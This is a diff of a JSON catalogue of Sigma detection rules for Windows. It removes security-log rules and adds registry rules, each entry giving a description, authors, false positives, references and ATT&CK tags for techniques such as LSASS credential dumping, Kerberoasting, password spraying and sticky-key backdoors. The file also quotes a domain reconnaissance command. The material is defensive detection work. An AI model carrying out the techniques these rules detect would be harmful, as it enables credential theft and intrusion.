"logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", - "value": "Failed Logins with Different Accounts from Single Source System" - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/01/10", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source2.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ] - }, - "uuid": "6309ffc4-8fa2-47cf-96b8-a2f72e58e538", - "value": "Failed NTLM Logins with Different Accounts from Single Source System" - }, - { - "description": "Detects multiple failed logins with multiple valid domain accounts from a single source system using the Kerberos protocol.", - "meta": { - "author": "Mauricio Velazco, frack113", - "creation_date": "2021/06/01", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "filename": "win_security_susp_failed_logons_single_source_kerberos.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "5d1d946e-32e6-4d9a-a0dc-0ac022c7eb98", - "value": "Valid Users Failing to Authenticate From Single Source Using Kerberos" - }, - { - "description": "Detects failed logins with multiple disabled domain accounts from a single source system using the Kerberos protocol.", - "meta": { - "author": "Mauricio Velazco, frack113", - "creation_date": "2021/06/01", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "filename": "win_security_susp_failed_logons_single_source_kerberos2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "4b6fe998-b69c-46d8-901b-13677c9fb663", - "value": "Disabled Users Failing To Authenticate From Source Using Kerberos" - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the Kerberos protocol.", - "meta": { - "author": "Mauricio Velazco, frack113", - "creation_date": "2021/06/01", - "falsepositive": [ - "Vulnerability scanners", - "Misconfigured systems", - "Remote administration tools", - "VPN terminators", - "Multiuser systems like Citrix server farms" - ], - "filename": "win_security_susp_failed_logons_single_source_kerberos3.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_kerberos3.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "bc93dfe6-8242-411e-a2dd-d16fa0cc8564", - "value": "Invalid Users Failing To Authenticate From Source Using Kerberos" - }, - { - "description": "Detects failed logins with multiple valid domain accounts from a single source system using the NTLM protocol.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source_ntlm.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "f88bab7f-b1f4-41bb-bdb1-4b8af35b0470", - "value": "Valid Users Failing to Authenticate from Single Source Using NTLM" - }, - { - "description": "Detects failed logins with multiple invalid domain accounts from a single source system using the NTLM protocol.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_logons_single_source_ntlm2.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source_ntlm2.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "56d62ef8-3462-4890-9859-7b41e541f8d5", - "value": "Invalid Users Failing To Authenticate From Single Source Using NTLM" - }, - { - "description": "This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/19", - "falsepositive": [ - "User using a disabled account" - ], - "filename": "win_security_susp_failed_logon_reasons.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", - "https://twitter.com/SBousseaden/status/1101431884540710913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_reasons.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.initial_access", - "attack.t1078" - ] - }, - "uuid": "9eb99343-d336-4020-a3cd-67f3819e68ee", - "value": "Account Tampering - Suspicious Failed Logon Reasons" - }, - { - "description": "A login from a public IP can indicate a misconfigured firewall or network boundary.", - "meta": { - "author": "NVISO", - "creation_date": "2020/05/06", - "falsepositive": [ - "Legitimate logon attempts over the internet", - "IPv4-to-IPv6 mapped IPs" - ], - "filename": "win_security_susp_failed_logon_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logon_source.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.t1078", - "attack.t1190", - "attack.t1133" - ] - }, - "uuid": "f88e112a-21aa-44bd-9b01-6ee2a2bbbed1", - "value": "Failed Logon From Public IP" - }, - { - "description": "Detects a source system failing to authenticate against a remote host with multiple users.", - "meta": { - "author": "Mauricio Velazco", - "creation_date": "2021/06/01", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "filename": "win_security_susp_failed_remote_logons_single_source.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_remote_logons_single_source.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ] - }, - "uuid": "add2ef8d-dc91-4002-9e7e-f2702369f53a", - "value": "Multiple Users Remotely Failing To Authenticate From Single Source" - }, - { - "description": "This method triggers on rare Kerberos Failure Codes caused by manipulations of Kerberos messages", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/10", - "falsepositive": [ - "Faulty legacy applications" - ], - "filename": "win_security_susp_kerberos_manipulation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_kerberos_manipulation.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "f7644214-0eb0-4ace-9455-331ec4c09253", - "value": "Kerberos Manipulation" - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with KrbRelayUp and the like", - "meta": { - "author": "@SBousseaden, Florian Roth", - "creation_date": "2022/04/27", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_krbrelayup.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1518976397364056071?s=12&t=qKO5eKHvWhAP19a50FTZ7g", - "https://github.com/elastic/detection-rules/blob/fb6ee2c69864ffdfe347bf3b050cb931f53067a6/rules/windows/privilege_escalation_krbrelayup_suspicious_logon.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_krbrelayup.yml" + "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", + "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" ], "tags": [ "attack.privilege_escalation", - "attack.credential_access" + "attack.persistence", + "attack.t1546.008", + "car.2014-11-003", + "car.2014-11-008" ] }, - "uuid": "749c9f5e-b353-4b90-a9c1-05243357ca4b", - "value": "KrbRelayUp Attack Pattern" + "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "value": "Sticky Key Like Backdoor Usage - Registry" }, { - "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", "meta": { - "author": "xknow @xknow_infosec", - "creation_date": "2019/03/24", - "falsepositive": [ - "Companies, who may use these default LDAP-Attributes for personal information" - ], - "filename": "win_security_susp_ldap_dataexchange.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://medium.com/@ivecodoe/detecting-ldapfragger-a-newly-released-cobalt-strike-beacon-using-ldap-for-c2-communication-c274a7f00961", - "https://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/", - "https://github.com/fox-it/LDAPFragger", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" - ], - "tags": [ - "attack.t1001.003", - "attack.command_and_control" - ] - }, - "uuid": "d00a9a72-2c09-4459-ad03-5e0a23351e36", - "value": "Suspicious LDAP-Attributes Used" - }, - { - "description": "Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as an covering detection for exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.", - "meta": { - "author": "James Pemberton / @4A616D6573", - "creation_date": "2019/10/31", + "author": "Ilyas Ochkov, oscd.community, Tim Shelton", + "creation_date": "2019/10/25", "falsepositive": [ "Unknown" ], - "filename": "win_security_susp_local_anon_logon_created.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", + "level": "medium", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1189469425482829824", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_local_anon_logon_created.yml" + "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" ], "tags": [ "attack.persistence", - "attack.t1136.001", - "attack.t1136.002" + "attack.t1546.010" ] }, - "uuid": "1bbf25b9-8038-4154-a50b-118f2a32be27", - "value": "Suspicious Windows ANONYMOUS LOGON Local Account Created" + "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", + "value": "New DLL Added to AppInit_DLLs Registry Key" }, { - "description": "Detects suspicious processes logging on with explicit credentials", + "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", "meta": { - "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Tim Shelton", - "creation_date": "2020/10/05", - "falsepositive": [ - "Administrators that use the RunAS command or scheduled tasks" - ], - "filename": "win_security_susp_logon_explicit_credentials.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_explicit_credentials.yml" - ], - "tags": [ - "attack.t1078", - "attack.lateral_movement" - ] - }, - "uuid": "941e5c45-cda7-4864-8cea-bbb7458d194a", - "value": "Suspicious Remote Logon with Explicit Credentials" - }, - { - "description": "Detects logon events that specify new credentials", - "meta": { - "author": "Max Altgelt", - "creation_date": "2022/04/06", - "falsepositive": [ - "Legitimate remote administration activity" - ], - "filename": "win_security_susp_logon_newcredentials.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://go.recordedfuture.com/hubfs/reports/mtp-2021-0914.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_logon_newcredentials.yml" - ], - "tags": "No established tags" - }, - "uuid": "def8b624-e08f-4ae1-8612-1ba21190da6b", - "value": "Outgoing Logon with New Credentials" - }, - { - "description": "Detects process handle on LSASS process with certain access mask and object type SAM_DOMAIN", - "meta": { - "author": "sigma", - "creation_date": "2017/02/12", + "author": "Dmitriy Lifanov, oscd.community", + "creation_date": "2019/10/25", "falsepositive": [ "Unknown" ], - "filename": "win_security_susp_lsass_dump.yml", + "filename": "registry_event_narrator_feedback_persistance.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://twitter.com/jackcr/status/807385668833968128", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump.yml" + "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" ], "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.persistence", + "attack.t1547.001" ] }, - "uuid": "aa1697b7-d611-4f9a-9cb2-5125b4ccfd5c", - "value": "Password Dumper Activity on LSASS" + "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", + "value": "Narrator's Feedback-Hub Persistence" }, { - "description": "Detects process handle on LSASS process with certain access mask", + "description": "Detects the presence of a registry key created during Azorult execution", "meta": { - "author": "Roberto Rodriguez, Teymur Kheirkhabarov, Dimitrios Slamaris, Mark Russinovich, Aleksey Potapov, oscd.community (update)", - "creation_date": "2019/11/01", - "falsepositive": [ - "Legitimate software accessing LSASS process for legitimate reason; update the whitelist with it" - ], - "filename": "win_security_susp_lsass_dump_generic.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html", - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_lsass_dump_generic.yml" - ], - "tags": [ - "attack.credential_access", - "car.2019-04-004", - "attack.t1003.001" - ] - }, - "uuid": "4a1b6da0-d94f-4fc3-98fc-2d9cb9e5ee76", - "value": "Generic Password Dumper Activity on LSASS" - }, - { - "description": "Detects multiple file rename or delete events occurrence within a specified period of time by a same user (these events may signalize about ransomware activity).", - "meta": { - "author": "Vasiliy Burov, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Software uninstallation", - "Files restore activities" - ], - "filename": "win_security_susp_multiple_files_renamed_or_deleted.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.manageengine.com/data-security/how-to/how-to-detect-ransomware-attacks.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_multiple_files_renamed_or_deleted.yml" - ], - "tags": [ - "attack.impact", - "attack.t1486" - ] - }, - "uuid": "97919310-06a7-482c-9639-92b67ed63cf8", - "value": "Suspicious Multiple File Rename Or Delete Occurred" - }, - { - "description": "Detects activity as \"net user administrator /domain\" and \"net group domain admins /domain\"", - "meta": { - "author": "Florian Roth (rule), Jack Croock (method), Jonhnathan Ribeiro (improvements), oscd.community", - "creation_date": "2017/03/07", - "falsepositive": [ - "Administrator activity" - ], - "filename": "win_security_susp_net_recon_activity.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://findingbad.blogspot.de/2017/01/hunting-what-does-it-look-like.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_net_recon_activity.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1069.002", - "attack.s0039" - ] - }, - "uuid": "968eef52-9cff-4454-8992-1e74b9cbad6c", - "value": "Reconnaissance Activity" - }, - { - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/09", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "filename": "win_security_susp_opened_encrypted_zip.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip.yml" - ], - "tags": "No established tags" - }, - "uuid": "00ba9da1-b510-4f6b-b258-8d338836180f", - "value": "Password Protected ZIP File Opened" - }, - { - "description": "Detects the extraction of password protected ZIP archives with suspicious file names. See the filename variable for more details on which file has been opened.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/09", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "filename": "win_security_susp_opened_encrypted_zip_filename.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_filename.yml" - ], - "tags": "No established tags" - }, - "uuid": "54f0434b-726f-48a1-b2aa-067df14516e4", - "value": "Password Protected ZIP File Opened (Suspicious Filenames)" - }, - { - "description": "Detects the extraction of password protected ZIP archives. See the filename variable for more details on which file has been opened.", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/05/09", - "falsepositive": [ - "Legitimate used of encrypted ZIP files" - ], - "filename": "win_security_susp_opened_encrypted_zip_outlook.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/sbousseaden/status/1523383197513379841", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_opened_encrypted_zip_outlook.yml" - ], - "tags": "No established tags" - }, - "uuid": "571498c8-908e-40b4-910b-d2369159a3da", - "value": "Password Protected ZIP File Opened (Email Attachment)" - }, - { - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Other browsers" - ], - "filename": "win_security_susp_outbound_kerberos_connection.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/GhostPack/Rubeus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_outbound_kerberos_connection.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1558.003" - ] - }, - "uuid": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "value": "Suspicious Outbound Kerberos Connection - Security" - }, - { - "description": "Detects possible addition of shadow credentials to an active directory object.", - "meta": { - "author": "Nasreddine Bencherchali (rule), Elastic (idea)", - "creation_date": "2022/10/17", - "falsepositive": [ - "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" - ], - "filename": "win_security_susp_possible_shadow_credentials_added.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", - "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", - "https://twitter.com/SBousseaden/status/1581300963650187264?", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1556" - ] - }, - "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", - "value": "Possible Shadow Credentials Added" - }, - { - "description": "detects execution of psexec or paexec with renamed service name, this rule helps to filter out the noise if psexec is used for legit purposes or if attacker uses a different psexec client other than sysinternal one", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", + "author": "Trent Liffick", + "creation_date": "2020/05/08", "falsepositive": [ "Unknown" ], - "filename": "win_security_susp_psexec.yml", - "level": "high", - "logsource.category": "No established category", + "filename": "registry_event_mal_azorult.yml", + "level": "critical", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ] - }, - "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", - "value": "Suspicious PsExec Execution" - }, - { - "description": "Detects known sensitive file extensions accessed on a network share", - "meta": { - "author": "Samir Bousseaden", - "creation_date": "2019/04/03", - "falsepositive": [ - "Help Desk operator doing backup or re-imaging end user machine or backup software", - "Users working with these data types or exchanging message files" - ], - "filename": "win_security_susp_raccess_sensitive_fext.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_raccess_sensitive_fext.yml" - ], - "tags": [ - "attack.collection", - "attack.t1039" - ] - }, - "uuid": "91c945bc-2ad1-4799-a591-4d00198a1215", - "value": "Suspicious Access to Sensitive File Extensions" - }, - { - "description": "Detects service ticket requests using RC4 encryption type", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/02/06", - "falsepositive": [ - "Service accounts used on legacy systems (e.g. NetApp)", - "Windows Domains with DFL 2003 and legacy systems" - ], - "filename": "win_security_susp_rc4_kerberos.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://adsecurity.org/?p=3458", - "https://www.trimarcsecurity.com/single-post/TrimarcResearch/Detecting-Kerberoasting-Activity", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rc4_kerberos.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "496a0e47-0a33-4dca-b009-9e6ca3591f39", - "value": "Suspicious Kerberos RC4 Ticket Encryption" - }, - { - "description": "Detects logon events that have characteristics of events generated during an attack with RottenPotato and the like", - "meta": { - "author": "@SBousseaden, Florian Roth", - "creation_date": "2019/11/15", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_rottenpotato.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1195284233729777665", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_rottenpotato.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.credential_access", - "attack.t1557.001" - ] - }, - "uuid": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", - "value": "RottenPotato Like Attack Pattern" - }, - { - "description": "Detects a possible remote NTLM hash change through SAMR API SamiChangePasswordUser() or SamSetInformationUser().\n\"Audit User Account Management\" in \"Advanced Audit Policy Configuration\" has to be enabled in your local security policy / GPO to see this events.\n", - "meta": { - "author": "Dimitrios Slamaris", - "creation_date": "2017/06/09", - "falsepositive": "No established falsepositives", - "filename": "win_security_susp_samr_pwset.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_samr_pwset.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1212" - ] - }, - "uuid": "7818b381-5eb1-4641-bea5-ef9e4cfb5951", - "value": "Possible Remote Password Change Through SAMR" - }, - { - "description": "Detects suspicious scheduled task creation events. Based on attributes such as paths, commands line flags, etc.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_scheduled_task_creation.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_creation.yml" + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" ], "tags": [ "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" + "attack.t1112" ] }, - "uuid": "3a734d25-df5c-4b99-8034-af1ddb5883a4", - "value": "Suspicious Scheduled Task Creation" + "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "value": "Registry Entries For Azorult Malware" }, { - "description": "Detects when adversaries stop services or processes by deleting or disabling their respective schdueled tasks in order to conduct data destructive activities", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", + "author": "Nik Seetharaman", + "creation_date": "2018/07/16", "falsepositive": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], - "filename": "win_security_susp_scheduled_task_delete.yml", + "filename": "registry_event_cmstp_execution_by_registry.yml", "level": "high", - "logsource.category": "No established category", + "logsource.category": "registry_event", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4701", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_delete.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "7595ba94-cf3b-4471-aa03-4f6baa9e5fad", - "value": "Important Scheduled Task Deleted/Disabled" - }, - { - "description": "Detects update to a scheduled task event that contain suspicious keywords.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/05", - "falsepositive": [ - "Unknown" - ], - "filename": "win_security_susp_scheduled_task_update.yml", - "level": "high", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4698", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_scheduled_task_update.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1053.005" - ] - }, - "uuid": "614cf376-6651-47c4-9dcc-6b9527f749f4", - "value": "Suspicious Scheduled Task Update" - }, - { - "description": "Detects renaming of file while deletion with SDelete tool.", - "meta": { - "author": "Thomas Patzke", - "creation_date": "2017/06/14", - "falsepositive": [ - "Legitimate usage of SDelete" - ], - "filename": "win_security_susp_sdelete.yml", - "level": "medium", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", - "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", - "https://docs.microsoft.com/en-gb/sysinternals/downloads/sdelete", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" - ], - "tags": [ - "attack.impact", - "attack.defense_evasion", - "attack.t1070.004", - "attack.t1027.005", - "attack.t1485", - "attack.t1553.002", - "attack.s0195" - ] - }, - "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", - "value": "Secure Deletion with SDelete" - }, - { - "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", - "meta": { - "author": "@neu5ron", - "creation_date": "2019/02/05", - "falsepositive": [ - "HyperV or other virtualization technologies with binary not listed in filter portion of detection" - ], - "filename": "win_security_susp_time_modification.yml", - "level": "low", - "logsource.category": "No established category", - "logsource.product": "windows", - "refs": [ - "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", - "Live environment caused by malware", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" + 